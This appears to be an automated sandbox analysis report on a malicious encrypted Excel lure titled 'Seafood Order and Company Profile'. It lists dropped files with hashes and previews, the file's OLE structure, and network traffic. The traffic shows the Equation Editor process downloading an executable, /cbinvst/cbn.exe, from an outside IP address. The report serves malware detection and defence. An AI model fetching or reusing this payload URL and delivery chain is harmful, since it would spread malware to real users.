    Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\620EEE8A.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):84203
    Entropy (8bit):7.979766688932294
    Encrypted:false
    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
    MD5:208FD40D2F72D9AED77A86A44782E9E2
    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
    Malicious:false
    Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63886F76.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):51166
    Entropy (8bit):7.767050944061069
    Encrypted:false
    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
    Malicious:false
    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\652F53D0.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):50311
    Entropy (8bit):7.960958863022709
    Encrypted:false
    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
    MD5:4141C7515CE64FED13BE6D2BA33299AA
    SHA1:B290F533537A734B7030CE1269AC8C5398754194
    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
    Malicious:false
    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9268C444.emf
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
    Category:dropped
    Size (bytes):7608
    Entropy (8bit):5.091127811854214
    Encrypted:false
    SSDEEP:96:+SDjyLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Djr+sW31RGtdVDYM3VfmkpH
    MD5:EB06F07412A815AED391F20298C1087B
    SHA1:AC0601FFC173F50B56C3AE2265C61B76711FBE01
    SHA-256:5CA81C391E8CA113254221D535BE4E0677908DA61DE0016EC963DD443F535FDE
    SHA-512:38AEF603FAC0AB6FB7159EBA5B48BD7E191A433739710AEACB11538E51ADA5E99CD724BE5B3886986FCBB02375B0C132B0C303AE8838602BCE88475DDD727A49
    Malicious:false
    Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I....................................................v.Ze..............%f^..................Y...Y.'.wq....\.....Y.......Y.@.Y.W.wq......Y..6.v_.wq......wq.Ze.4.g^..Y...f^0.g^......g^..f^........4.g^@.Y...f^......f^..........g^..Y.......g^4tf^..g^............<..u.Z.v.....Ze......Ze........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ADDE7728.jpeg
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
    Category:dropped
    Size (bytes):8815
    Entropy (8bit):7.944898651451431
    Encrypted:false
    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
    MD5:F06432656347B7042C803FE58F4043E1
    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
    Malicious:false
    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B859F61C.jpeg
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
    Category:dropped
    Size (bytes):29499
    Entropy (8bit):7.667442162526095
    Encrypted:false
    SSDEEP:384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
    MD5:4FBDDF16124B6C9368537DF70A238C14
    SHA1:45E34D715128C6954F589910E6D0429370D3E01A
    SHA-256:0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
    SHA-512:EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
    Malicious:false
    Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3F67A5E.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):79394
    Entropy (8bit):7.864111100215953
    Encrypted:false
    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
    MD5:16925690E9B366EA60B610F517789AF1
    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
    Malicious:false
    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D95AA64B.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):84203
    Entropy (8bit):7.979766688932294
    Encrypted:false
    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
    MD5:208FD40D2F72D9AED77A86A44782E9E2
    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
    Malicious:false
    Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E2B60F8F.emf
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
    Category:dropped
    Size (bytes):648132
    Entropy (8bit):2.8124530118203914
    Encrypted:false
    SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
    MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
    SHA1:F677467423105ACF39B76CB366F08152527052B3
    SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
    SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
    Malicious:false
    Preview: ....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB73AAC7.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):51166
    Entropy (8bit):7.767050944061069
    Encrypted:false
    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
    Malicious:false
    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
    C:\Users\user\Desktop\~$Seafood Order and Company Profile.xlsx
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):330
    Entropy (8bit):1.4377382811115937
    Encrypted:false
    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
    MD5:96114D75E30EBD26B572C1FC83D1D02E
    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
    Malicious:true
    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

    Static File Info

    General

    File type:CDFV2 Encrypted
    Entropy (8bit):7.995552020832647
    TrID:
    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
    File name:Seafood Order and Company Profile.xlsx
    File size:1315840
    MD5:4c9867155a69c0e089cbf6e287442798
    SHA1:72fd5acd0ce33714c3aff9e837af3be0db733800
    SHA256:9fcc8435ac8254ae9b1dea93cff53098e94d193ea4edef5b5300e7c8f0328d2c
    SHA512:4855ee30d0d5b56f6fa33ef20cf709b80aae2dfabc7eadfb65e21328aaa3d8634086b7a31bb8cfe2201fec21ccb18f6424e09f8cdd332de1df4655bcfe076f35
    SSDEEP:24576:0qPFc03WtYM1mvUtca7XBUBMfaM0XeUSkiRROa:XChtYvvqRUBqazu/H
    File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

    File Icon

    Icon Hash:e4e2aa8aa4b4bcb4

    Static OLE Info

    General

    Document Type:OLE
    Number of OLE Files:1

    OLE File "Seafood Order and Company Profile.xlsx"

    Indicators

    Has Summary Info:False
    Application Name:unknown
    Encrypted Document:True
    Contains Word Document Stream:False
    Contains Workbook/Book Stream:False
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:False

    Streams

    Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
    General
    Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
    File Type:data
    Stream Size:64
    Entropy:2.73637206947
    Base64 Encoded:False
    Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
    Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
    Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
    General
    Stream Path:\x6DataSpaces/DataSpaceMap
    File Type:data
    Stream Size:112
    Entropy:2.7597816111
    Base64 Encoded:False
    Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
    Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
    Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
    General
    Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
    File Type:data
    Stream Size:200
    Entropy:3.13335930328
    Base64 Encoded:False
    Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
    Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
    General
    Stream Path:\x6DataSpaces/Version
    File Type:data
    Stream Size:76
    Entropy:2.79079600998
    Base64 Encoded:False
    Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
    Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
    Stream Path: EncryptedPackage, File Type: data, Stream Size: 1301128
    General
    Stream Path:EncryptedPackage
    File Type:data
    Stream Size:1301128
    Entropy:7.9998536578
    Base64 Encoded:True
    Data ASCII:} . . . . . . . . . . . . . . O . . . . . . - . U . E h % f . Y . . . . 0 ) . . . . . i u . . . + , . . . . . . h H . . . . . N | K e . . . . . . . . . . . E . % . . . . . . . . . . . . . E . % . . . . . . . . . . . . . E . % . . . . . . . . . . . . . E . % . . . . . . . . . . . . . E . % . . . . . . . . . . . . . E . % . . . . . . . . . . . . . E . % . . . . . . . . . . . . . E . % . . . . . . . . . . . . . E . % . . . . . . . . . . . . . E . % . . . . . . . . . . . . . E . % . . . . . . . . . . . . . E .
    Data Raw:7d da 13 00 00 00 00 00 9b 1e fc ad 9f 90 a7 4f 8a 13 d5 81 0d 87 2d 95 55 a2 45 68 25 66 04 59 86 04 d9 c7 30 29 e4 d6 1a cc a2 69 75 b6 0c d6 2b 2c 1a f3 82 b3 09 c7 68 48 12 0a c1 17 ae 4e 7c 4b 65 b9 8b d5 03 af 9c 98 9b eb b5 9c 45 1b 25 8e c3 f4 83 82 1e 83 9c 98 9b eb b5 9c 45 1b 25 8e c3 f4 83 82 1e 83 9c 98 9b eb b5 9c 45 1b 25 8e c3 f4 83 82 1e 83 9c 98 9b eb b5 9c 45 1b
    Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
    General
    Stream Path:EncryptionInfo
    File Type:data
    Stream Size:224
    Entropy:4.54585124335
    Base64 Encoded:False
    Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . e . ` . ` . > . . . . [ . . + ) . . . . . . . J 5 . . _ V 3 . . . . . ) . d . . 3 ^ Y . . . . . r . . . ; ) . 4 . . V . . . 2 . x . 1
    Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Jun 16, 2021 12:17:42.105499983 CEST4916780192.168.2.22103.133.109.192
    Jun 16, 2021 12:17:42.354635000 CEST8049167103.133.109.192192.168.2.22
    Jun 16, 2021 12:17:42.354748011 CEST4916780192.168.2.22103.133.109.192
    Jun 16, 2021 12:17:42.355107069 CEST4916780192.168.2.22103.133.109.192
    Jun 16, 2021 12:17:42.607487917 CEST8049167103.133.109.192192.168.2.22
    Jun 16, 2021 12:17:42.608426094 CEST4916780192.168.2.22103.133.109.192
    Jun 16, 2021 12:17:45.411159039 CEST4916780192.168.2.22103.133.109.192

    HTTP Request Dependency Graph

    • 103.133.109.192

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249167103.133.109.19280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    TimestampkBytes transferredDirectionData
    Jun 16, 2021 12:17:42.355107069 CEST1OUTGET /cbinvst/cbn.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
